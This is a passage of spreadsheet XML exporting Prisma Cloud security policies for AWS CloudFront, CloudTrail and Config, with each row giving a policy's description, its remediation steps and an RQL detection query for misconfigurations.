          <t>1. Sign in to the AWS Console
2. Go to CloudFront
3. Choose the reported Distribution
4. Click on Distribution Settings
5. Click on 'Origins and Origin Groups
6. Select the S3 bucket and click on Edit
7. On the 'Restrict Bucket Access', Select Yes
8. Click on 'Yes, Edit' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-aws-cloudfromt-distribution-with-s3-have-origin-access-set-to-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-aws-cloudfromt-distribution-with-s3-have-origin-access-set-to-enabled</t>
        </is>
      </c>
      <c r="Y17" t="inlineStr"/>
      <c r="Z17" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = 'origins.items[*].s3OriginConfig exists and origins.items[*].s3OriginConfig.originAccessIdentity is empty and origins.items[*].originAccessControlId is empty'
{"category":"IAM","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA17" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB17" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC17" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-369-CKV2_AWS_46</t>
        </is>
      </c>
      <c r="AD17" t="b">
        <v>1</v>
      </c>
      <c r="AE17" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF17" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>b0aac456-7422-47fc-9144-9b150bd18a9d</t>
        </is>
      </c>
      <c r="AI17" t="inlineStr">
        <is>
          <t>a1340b61-fd2e-4f5b-a3b6-a867040ecf58</t>
        </is>
      </c>
      <c r="AJ17" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK17" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B18" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C18" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D18" t="inlineStr"/>
      <c r="E18" t="inlineStr"/>
      <c r="F18" t="inlineStr"/>
      <c r="G18" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J18" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K18" t="inlineStr">
        <is>
          <t>AWS CloudFront distribution is using insecure SSL protocols for HTTPS communication</t>
        </is>
      </c>
      <c r="L18" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M18" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N18" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O18" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P18" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q18" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R18" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S18" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T18" t="b">
        <v>0</v>
      </c>
      <c r="U18" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V18" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W18" t="inlineStr">
        <is>
          <t>CloudFront, a content delivery network (CDN) offered by AWS, is not using a secure cipher for distribution. It is a best security practice to enforce the use of secure ciphers TLSv1.0, TLSv1.1, and/or TLSv1.2 in a CloudFront Distribution's certificate configuration. This policy scans for any deviations from this practice and returns the results.</t>
        </is>
      </c>
      <c r="X18" t="inlineStr">
        <is>
          <t>Communication between CloudFront and your Custom Origin should enforce the use of secure ciphers. Modify the CloudFront Origin's Origin SSL Protocol to include TLSv1.0, TLSv1.1, and/or TLSv1.2.
1. Go to the AWS console CloudFront dashboard.
2. Select your distribution Id.
3. Select the 'Origins' tab.
4. Check the origin you want to modify then select Edit.
5. Remove (uncheck) 'SSLv3' from Origin SSL Protocols.
6. Select 'Yes, Edit.' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-2-54
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-2-54</t>
        </is>
      </c>
      <c r="Y18" t="inlineStr"/>
      <c r="Z18" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = (origins.items[*] contains "customOriginConfig") and (origins.items[?(@.customOriginConfig.originSslProtocols.items)] contains "SSLv3")
{"category":"Networking","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA18" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB18" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC18" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-256-CKV2_AWS_54</t>
        </is>
      </c>
      <c r="AD18" t="b">
        <v>1</v>
      </c>
      <c r="AE18" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF18" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>39df6f76-fc34-4660-97a1-fc967e3abe33</t>
        </is>
      </c>
      <c r="AI18" t="inlineStr">
        <is>
          <t>90b66466-c8e7-4cc0-a49d-104ae5451e52</t>
        </is>
      </c>
      <c r="AJ18" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK18" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B19" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C19" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D19" t="inlineStr"/>
      <c r="E19" t="inlineStr"/>
      <c r="F19" t="inlineStr"/>
      <c r="G19" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J19" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K19" t="inlineStr">
        <is>
          <t>AWS CloudTrail logs are not encrypted using Customer Master Keys (CMKs)</t>
        </is>
      </c>
      <c r="L19" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M19" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N19" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O19" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P19" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q19" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R19" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S19" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T19" t="b">
        <v>0</v>
      </c>
      <c r="U19" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V19" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W19" t="inlineStr">
        <is>
          <t>Checks to ensure that CloudTrail logs are encrypted. AWS CloudTrail is a service that enables governance, compliance, operational &amp; risk auditing of the AWS account. It is a compliance and security best practice to encrypt the CloudTrail data since it may contain sensitive information.</t>
        </is>
      </c>
      <c r="X19" t="inlineStr">
        <is>
          <t>1. Login to AWS Console and navigate to the 'CloudTrail' service.
2. For each trail, under Configuration &gt; Storage Location, select 'Yes' to 'Encrypt log files' setting
3.Choose and existing KMS key or create a new one to encrypt the logs with. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-294
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-294</t>
        </is>
      </c>
      <c r="Y19" t="inlineStr"/>
      <c r="Z19" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name='aws-cloudtrail-describe-trails' AND cloud.type = 'aws' AND json.rule = 'kmsKeyId does not exist'
{"category":"General","resourceTypes":["aws_cloudtrail_event_data_store"]}</t>
        </is>
      </c>
      <c r="AA19" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB19" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC19" t="inlineStr">
        <is>
          <t>PC-AWS-CT-5-CKV_AWS_294</t>
        </is>
      </c>
      <c r="AD19" t="b">
        <v>1</v>
      </c>
      <c r="AE19" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF19" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>c2b84f89-7ec8-473e-a6af-404feeeb96c5</t>
        </is>
      </c>
      <c r="AI19" t="inlineStr">
        <is>
          <t>c2b84f89-7ec8-473e-a6af-404feeeb96c5</t>
        </is>
      </c>
      <c r="AJ19" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK19" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B20" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C20" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D20" t="n">
        <v>0</v>
      </c>
      <c r="E20" t="n">
        <v>0</v>
      </c>
      <c r="F20" t="n">
        <v>47</v>
      </c>
      <c r="G20" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J20" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K20" t="inlineStr">
        <is>
          <t>AWS CloudTrail is not enabled with multi trail and not capturing all management events</t>
        </is>
      </c>
      <c r="L20" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M20" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N20" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O20" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P20" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q20" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R20" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S20" t="inlineStr">
        <is>
          <t>CIS,PCI DSS v3.2,Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T20" t="b">
        <v>0</v>
      </c>
      <c r="U20" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V20" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W20" t="inlineStr">
        <is>
          <t>This policy identifies the AWS accounts which do not have a CloudTrail with multi trail enabled and capturing all management events. AWS CloudTrail is a service that enables governance, compliance, operational &amp; risk auditing of the AWS account. It is a compliance and security best practice to turn on CloudTrail across different regions to get a complete audit trail of activities across various services.
NOTE: If you have Organization Trail enabled in your account, this policy can be disabled, or alerts generated for this policy on such an account can be ignored; as Organization Trail by default enables trail log for all accounts under that organization.</t>
        </is>
      </c>
      <c r="X20" t="inlineStr">
        <is>
          <t>Refer to the following link to create/update the trail:
https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-create-and-update-a-trail.html
Refer to the following link for more info on logging management events:
Logging management events - AWS CloudTrail 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-1</t>
        </is>
      </c>
      <c r="Y20" t="inlineStr"/>
      <c r="Z20" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name= 'aws-cloudtrail-describe-trails' AND json.rule = 'isMultiRegionTrail is true and includeGlobalServiceEvents is true' as X; config from cloud.resource where api.name= 'aws-cloudtrail-get-trail-status' AND json.rule = 'status.isLogging equals true' as Y; config from cloud.resource where api.name= 'aws-cloudtrail-get-event-selectors' AND json.rule = '(eventSelectors[*].readWriteType contains All and eventSelectors[*].includeManagementEvents equal ignore case true) or (advancedEventSelectors[*].fieldSelectors[*].equals contains "Management" and advancedEventSelectors[*].fieldSelectors[*].field does not contain "readOnly" and advancedEventSelectors[*].fieldSelectors[*].field does not contain "eventSource")' as Z; filter '($.X.trailARN equals $.Z.trailARN) and ($.X.name equals $.Y.trail)'; show X; count(X) less than 1
{"category":"General","resourceTypes":["aws_cloudtrail"]}</t>
        </is>
      </c>
      <c r="AA20" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB20" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC20" t="inlineStr">
        <is>
          <t>PC-AWS-CT-3-CKV_AWS_67</t>
        </is>
      </c>
      <c r="AD20" t="b">
        <v>1</v>
      </c>
      <c r="AE20" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF20" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>36a5345a-230d-438e-a04c-a287a513e3dc</t>
        </is>
      </c>
      <c r="AI20" t="inlineStr">
        <is>
          <t>36a5345a-230d-438e-a04c-a287a513e3dc</t>
        </is>
      </c>
      <c r="AJ20" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK20" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B21" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C21" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D21" t="inlineStr"/>
      <c r="E21" t="inlineStr"/>
      <c r="F21" t="inlineStr"/>
      <c r="G21" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J21" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K21" t="inlineStr">
        <is>
          <t>AWS CloudTrail log validation is not enabled in all regions</t>
        </is>
      </c>
      <c r="L21" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M21" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N21" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O21" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P21" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q21" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R21" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S21" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T21" t="b">
        <v>1</v>
      </c>
      <c r="U21" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V21" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W21" t="inlineStr">
        <is>
          <t>This policy identifies AWS CloudTrails in which log validation is not enabled in all regions. CloudTrail log file validation creates a digitally signed digest file containing a hash of each log that CloudTrail writes to S3. These digest files can be used to determine whether a log file was modified after CloudTrail delivered the log. It is recommended that file validation be enabled on all CloudTrails.</t>
        </is>
      </c>
      <c r="X21" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Access the 'CloudTrail' service.
4. For each trail reported, under Configuration &gt; Storage Location, make sure 'Enable log file validation' is set to 'Yes'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-2</t>
        </is>
      </c>
      <c r="Y21" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'cloudtrail:UpdateTrail' permission. Successful execution will enable the log file validation for this CloudTrail.",
'impact': 'Enable CloudTrail log file validation',
'cliScriptTemplate': 'aws cloudtrail update-trail --name $resourceName --region $region --enable-log-file-validation'</t>
        </is>
      </c>
      <c r="Z21" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-cloudtrail-describe-trails' AND json.rule='logFileValidationEnabled is false'
{"category":"Logging","resourceTypes":["aws_cloudtrail"]}</t>
        </is>
      </c>
      <c r="AA21" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB21" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC21" t="inlineStr">
        <is>
          <t>PC-AWS-CT-4-CKV_AWS_36</t>
        </is>
      </c>
      <c r="AD21" t="b">
        <v>1</v>
      </c>
      <c r="AE21" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF21" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>38e3d3cf-b694-46ec-8bd2-8f02194b5040</t>
        </is>
      </c>
      <c r="AI21" t="inlineStr">
        <is>
          <t>38e3d3cf-b694-46ec-8bd2-8f02194b5040</t>
        </is>
      </c>
      <c r="AJ21" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK21" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B22" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C22" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D22" t="n">
        <v>0</v>
      </c>
      <c r="E22" t="n">
        <v>0</v>
      </c>
      <c r="F22" t="n">
        <v>22</v>
      </c>
      <c r="G22" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J22" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K22" t="inlineStr">
        <is>
          <t>AWS CloudTrail trail logs is not integrated with CloudWatch Log</t>
        </is>
      </c>
      <c r="L22" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M22" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N22" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O22" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P22" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q22" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R22" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S22" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T22" t="b">
        <v>0</v>
      </c>
      <c r="U22" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V22" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W22" t="inlineStr">
        <is>
          <t>This policy identifies AWS CloudTrail which has trail logs that are not integrated with CloudWatch Log. Enabling the CloudTrail trail logs integrated with CloudWatch Logs will enable the real-time as well as historic activity logging. This will further improve monitoring and alarm capability.</t>
        </is>
      </c>
      <c r="X22" t="inlineStr">
        <is>
          <t>1. Login to the AWS Admin Console and access the CloudTrail service.
2. Click on the Trails in the left hand menu.
3. Click on the identified CloudTrail and navigate to the 'CloudWatch Logs' section.
4. Click on 'Configure' tab and provide required
5. Provide a log group name in field 'New or existing log group'
6. Click on 'Continue'
7. In the next page from 'IAM role' dropdown select an IAM role with required access or select the 'Create a new IAM role'
8. Click on 'Allow' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs</t>
        </is>
      </c>
      <c r="Y22" t="inlineStr"/>
      <c r="Z22" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudtrail-describe-trails' AND json.rule = 'cloudWatchLogsRoleArn equals null or cloudWatchLogsRoleArn does not exist'
{"category":"Logging","resourceTypes":["aws_cloudtrail"]}</t>
        </is>
      </c>
      <c r="AA22" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB22" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC22" t="inlineStr">
        <is>
          <t>PC-AWS-CT-50-CKV2_AWS_10</t>
        </is>
      </c>
      <c r="AD22" t="b">
        <v>1</v>
      </c>
      <c r="AE22" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF22" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>0d07ac51-fbfe-44fe-8edb-3314c9995ee0</t>
        </is>
      </c>
      <c r="AI22" t="inlineStr">
        <is>
          <t>0d07ac51-fbfe-44fe-8edb-3314c9995ee0</t>
        </is>
      </c>
      <c r="AJ22" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK22" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B23" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C23" s="2" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="D23" t="inlineStr"/>
      <c r="E23" t="inlineStr"/>
      <c r="F23" t="inlineStr"/>
      <c r="G23" t="b">
        <v>0</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J23" t="inlineStr">
        <is>
          <t>aws-configservice</t>
        </is>
      </c>
      <c r="K23" t="inlineStr">
        <is>
          <t>AWS Config Recording is disabled IN (Region)</t>
        </is>
      </c>
      <c r="L23" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M23" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N23" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O23" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P23" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q23" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R23" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="S23" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Inventory,Custom</t>
        </is>
      </c>
      <c r="T23" t="b">
        <v>0</v>
      </c>
      <c r="U23" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V23" t="inlineStr">
        <is>
          <t>aws-configservice-describe-configuration-recorders</t>
        </is>
      </c>
      <c r="W23" t="inlineStr">
        <is>
          <t>AWS Config is a web service that performs configuration management of supported AWS resources within your account and delivers log files to you. AWS config uses configuration recorder to detect changes in your resource configurations and capture these changes as configuration items. It continuously monitors and records your AWS resource configurations and allows you to automate the evaluation of recorded configurations against desired configurations. This policy generates alerts when AWS Config recorder is not enabled.</t>
        </is>
      </c>
      <c r="X23" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Management Console
2. Select the specific region from the top down, for which the alert is generated
3. Navigate to service 'Config' from the 'Services' dropdown.
If AWS Config set up exists,
a. Go to Settings
b. Click on 'Turn On' button under 'Recording is Off' section,
c. provide required information for bucket and role with proper permission
If AWS Config set up doesn't exist
a. Click on 'Get Started'
b. For Step 1, Tick the check box for 'Record all resources supported in this region' under section 'Resource types to record'
c. Under section 'Amazon S3 bucket', select bucket with permission to Config services
d. Under section 'AWS Config role', select a role with permission to Config services
e. Click on 'Next'
f. For Step 2, Select required rule and click on 'Next' otherwise click on 'Skip'
g. For Step 3, Review the created 'Settings' and click on 'Confirm'</t>
        </is>
      </c>
      <c r="Y23" t="inlineStr"/>
      <c r="Z23" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND cloud.region IN ( 'AWS Frankfurt', 'AWS Ireland' ) AND api.name = 'aws-configservice-describe-configuration-recorders' AND json.rule = 'status.recording is true and status.lastStatus equals SUCCESS and recordingGroup.allSupported is true' as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA23" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB23" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC23" t="inlineStr"/>
      <c r="AD23" t="b">
        <v>0</v>
      </c>
      <c r="AE23" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF23" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>0f0bc7b9-5dc3-4523-89dd-bc1ed36c7982</t>
        </is>
      </c>
      <c r="AI23" t="inlineStr">
        <is>
          <t>069c57b2-0dfa-4b44-b9cf-6b1b2f754bb2</t>
        </is>
      </c>
      <c r="AJ23" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK23" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B24" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C24" s="2" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="D24" t="inlineStr"/>
      <c r="E24" t="inlineStr"/>
      <c r="F24" t="inlineStr"/>
      <c r="G24" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J24" t="inlineStr">
        <is>
          <t>aws-configservice</t>
        </is>
      </c>
      <c r="K24" t="inlineStr">
        <is>
          <t>AWS Config Recording is disabled</t>
        </is>
      </c>
      <c r="L24" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M24" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N24" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O24" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P24" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q24" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R24" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="S24" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Inventory</t>
        </is>
      </c>
      <c r="T24" t="b">
        <v>0</v>
      </c>
      <c r="U24" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V24" t="inlineStr">
        <is>
          <t>aws-configservice-describe-configuration-recorders</t>
